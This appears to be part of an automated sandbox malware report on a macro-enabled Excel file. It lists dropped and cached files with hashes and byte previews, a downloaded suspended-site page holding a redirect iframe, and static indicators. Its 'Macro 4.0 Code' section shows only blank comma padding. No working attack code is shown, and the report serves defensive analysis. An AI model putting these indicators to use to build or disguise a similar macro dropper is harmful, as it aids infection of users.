                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\95FD430A.png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34787
                                                                                                                                                                                                                      Entropy (8bit):7.9883689087667955
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                                                                                                                                                                                      MD5:2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                                                                                                                                                                                      SHA1:9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                                                                                                                                                                                      SHA-256:E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                                                                                                                                                                                      SHA-512:2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>..{'.......".bA.6.6..o/3...:......b....{HBBz./........[..%yI.!>...}.^{.o.........^..R.......=..c..-Z.n]cc...W.^...........z..2.9s.<....?|...._j.&.....R.......K...\.V..ukS..sgKKKWWWkk._@s....<x.Q..t..1bt.5k.QG....,X0f..Y.T...............k..y..k..K6^....v.x}..p....vX.MK..5.....j...X....8...~......z.{.aJ.Q...{.._|...|.....{.ui..M.)^...I.....};>..[n...../^..hnn.t.^.}..S.Ly.3.q.W.v.i)d.....W.x=p.".d@k.(.y...kE..P......mH"F^...\q..v)....K...R...:O..i..G......?...!.....y.^..W.....:u...).c.j ..=....X......<..u.]w.7.H.;.GE*...x.;^..WM.8.....G..x.?.Z*....:F..~..k..f.%.kN {..}(.d..C.z...2.G....x...S*.^....<..?..o...ME`......s.9.{.......>;.5....o.T....,..I.....?...o.w..6../~..>.....S.i1.Q.)^..VIe.........~._../..G...!C......|..k]]]v.x..wt......=.Y0...Z.9......=t.....]{S.)^.Mm...p..m......M.6....r.L.6MT..3'M.4{.l~.P[h....Wtttx........#.OR.\.r.e@
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\98923FA8.png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                                      Entropy (8bit):7.595467031611744
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                                                                      MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                                                                      SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                                                                      SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                                                                      SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\suspendedpage[1].htm
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):494
                                                                                                                                                                                                                      Entropy (8bit):4.962239405540505
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                                                                                                                                                      MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                                                                                                                                                      SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                                                                                                                                                      SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                                                                                                                                                      SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      IE Cache URL:https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                                                                                      Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\D1C40000
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):107618
                                                                                                                                                                                                                      Entropy (8bit):7.916016112653699
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfz:nl+yo9opH8x+3xs6ZQ7
                                                                                                                                                                                                                      MD5:405ECDBABD8FD62D8C20BD4F08267DE2
                                                                                                                                                                                                                      SHA1:483D3C78AF0413586863AAFA3B08F6D6AF9C2B5D
                                                                                                                                                                                                                      SHA-256:ABAE0B65B6360E8C1423317D96F9E63098BAC4059E75333CB03A9DD3CBDAE66A
                                                                                                                                                                                                                      SHA-512:E71DB6202577C9CEEBE13C9DACE77F623D9713E2B2564F3BAF692B53D30C41052DC6661AE269F3857F2C6C8116F6BB96D4C49DFA54E66E2FE82E87D684BFCE20
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue May 4 10:48:12 2021, atime=Tue May 4 10:48:12 2021, length=8192, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):904
                                                                                                                                                                                                                      Entropy (8bit):4.659727920923173
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:87XUrJjduCH2KOvEE4XEsUk7uX+WrjAZ/DYbDInRSeuSeL44t2Y+xIBjKZm:8Yxi4EHkiBAZbcDA37aB6m
                                                                                                                                                                                                                      MD5:F6369CC18C34A93D235C8BC862D5497F
                                                                                                                                                                                                                      SHA1:6BFAC0282760432AFA904C94455CEAEF989A62BC
                                                                                                                                                                                                                      SHA-256:E526B9F1AB8F838FC8B8161DCFD03A5BDFF2FA95EA7C35B50735BBDD98371588
                                                                                                                                                                                                                      SHA-512:3BEF03B505FE59788CF707F726B9D213AF46F59D2F8E5CB2E407EBA5603F0B19F0E28CEADEDED0BC52A8172E767615304B61229176C6F2B80FEA3770091DE444
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: L..................F.............-..{$.\.@.....\.@... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.]....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.]....#J....................3[..j.o.n.e.s.....~.1......R.^..Desktop.h.......N...R.^.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......610930...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):115
                                                                                                                                                                                                                      Entropy (8bit):4.418133942983911
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:oyBVomxWdadAdrXVoOytdAdrXVomxWdadAdrXVov:djuadgEtdguadgy
                                                                                                                                                                                                                      MD5:1DD64E34B701C2F1258FA5053DA222D3
                                                                                                                                                                                                                      SHA1:62C41DD710409066BF7DB8B6B73E3711CD135732
                                                                                                                                                                                                                      SHA-256:B8A5C62AFDAEB5DBBDB86B394AB15E3C62E4B1C420BCBDC0A7DEBE97EED271C2
                                                                                                                                                                                                                      SHA-512:405F0C07FFC2906218C49F9E81150ED5A3E53B1A421C3F06FA338AC08571EDAF566A8E1D6DB025E549C8DE4189FD3BC00AA8D43733E9F0587E4AEB7C7A6E836B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: Desktop.LNK=0..[misc]..statistic-2070252624.LNK=0..statistic-2070252624.LNK=0..[misc]..statistic-2070252624.LNK=0..
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-2070252624.LNK
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Tue May 4 10:48:12 2021, atime=Tue May 4 10:48:12 2021, length=107618, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2220
                                                                                                                                                                                                                      Entropy (8bit):4.713614328238765
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8IetxiwIzHJOyAPb+kvmDA77aB6myIetxiwIzHJOyAPb+kvmDA77aB6m:8I6xi1zH0PikyB6pI6xi1zH0PikyB6
                                                                                                                                                                                                                      MD5:7DEB29F3DC4524B664878593A87631E1
                                                                                                                                                                                                                      SHA1:D77C323719B199DC994C3229B8E8874352C5FF89
                                                                                                                                                                                                                      SHA-256:BA7107B002FC343B17543A36B93336BB1756110E8930C074F533342100132241
                                                                                                                                                                                                                      SHA-512:EDA5B454D79AF32BAC344FC7E587E0CDFD770D5552FD213B3B57268F64AE34A4D63622C7EDCB965E7FB1C9E80B1F8AA369ED53F5806903B845CAB3381A872C75
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: L..................F.... ......S......\.@....\.@..b............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.]....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.]....#J....................3[..j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N...R.].....Y..............>.....,...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.^ .STATIS~1.XLS..d......>Q{<.R.^.....V.....................-..s.t.a.t.i.s.t.i.c.-.2.0.7.0.2.5.2.6.2.4...x.l.s.m......._...............-.......^...........>.S......C:\Users\user\Desktop\statistic-2070252624.xlsm..0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.2.0.7.0.2.5.2.6.2.4...x.l.s.m.........:..,.LB.)...As...`.......X.......610930...........!a..%.H.VZAj...b................!a..%.H.VZAj...b...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22
                                                                                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                                                      C:\Users\user\Desktop\C2C40000
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):107618
                                                                                                                                                                                                                      Entropy (8bit):7.916016112653699
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfz:nl+yo9opH8x+3xs6ZQ7
                                                                                                                                                                                                                      MD5:405ECDBABD8FD62D8C20BD4F08267DE2
                                                                                                                                                                                                                      SHA1:483D3C78AF0413586863AAFA3B08F6D6AF9C2B5D
                                                                                                                                                                                                                      SHA-256:ABAE0B65B6360E8C1423317D96F9E63098BAC4059E75333CB03A9DD3CBDAE66A
                                                                                                                                                                                                                      SHA-512:E71DB6202577C9CEEBE13C9DACE77F623D9713E2B2564F3BAF692B53D30C41052DC6661AE269F3857F2C6C8116F6BB96D4C49DFA54E66E2FE82E87D684BFCE20
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\Desktop\~$statistic-2070252624.xlsm
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                                                                                      MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                                                                                      SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                                                                                      SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                                                                                      SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                      C:\Users\user\jordji.nbvt11
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):494
                                                                                                                                                                                                                      Entropy (8bit):4.962239405540505
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                                                                                                                                                      MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                                                                                                                                                      SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                                                                                                                                                      SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                                                                                                                                                      SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.

                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                                                                                      Entropy (8bit):7.917058358399405
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                                                                                      • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                                                                                      File name:statistic-2070252624.xlsm
                                                                                                                                                                                                                      File size:109084
                                                                                                                                                                                                                      MD5:0fbdc8a2acd4dc782821cfa4fdf75099
                                                                                                                                                                                                                      SHA1:e407df0a3a3ceed4c3e9aed5716974a45cd5c542
                                                                                                                                                                                                                      SHA256:abd13b66e40db6ad8a4489667c1a1d58fde38e7388970bfbc4d8c7b3fb6cb04e
                                                                                                                                                                                                                      SHA512:760a54caf1a66d36e8f4e6fc20c8380cb012d7b76d24e5fd91085943da3b31a8471a2093ddc862a7fdf3da4c7ff49459f372033d72d67fef021e8025c3006502
                                                                                                                                                                                                                      SSDEEP:1536:8utuov3BiTr4GDgM+nG92hjPcQpWUot9E8cNcrAOJOerwzkFBHhr6vQnf+zy7fc:8kuocrZDKGopH8x+8HdoLqp6vif+zUk
                                                                                                                                                                                                                      File Content Preview:PK..........!.t...............[Content_Types].xml ...(........................................................""...............................................................................................................................................

                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                      Icon Hash:74ecd0e2f696908c

                                                                                                                                                                                                                      Static OLE Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                                                                                      OLE File "statistic-2070252624.xlsm"

                                                                                                                                                                                                                      Indicators

                                                                                                                                                                                                                      Has Summary Info:
                                                                                                                                                                                                                      Application Name:
                                                                                                                                                                                                                      Encrypted Document:
                                                                                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                                                                                      Flash Objects Count:
                                                                                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,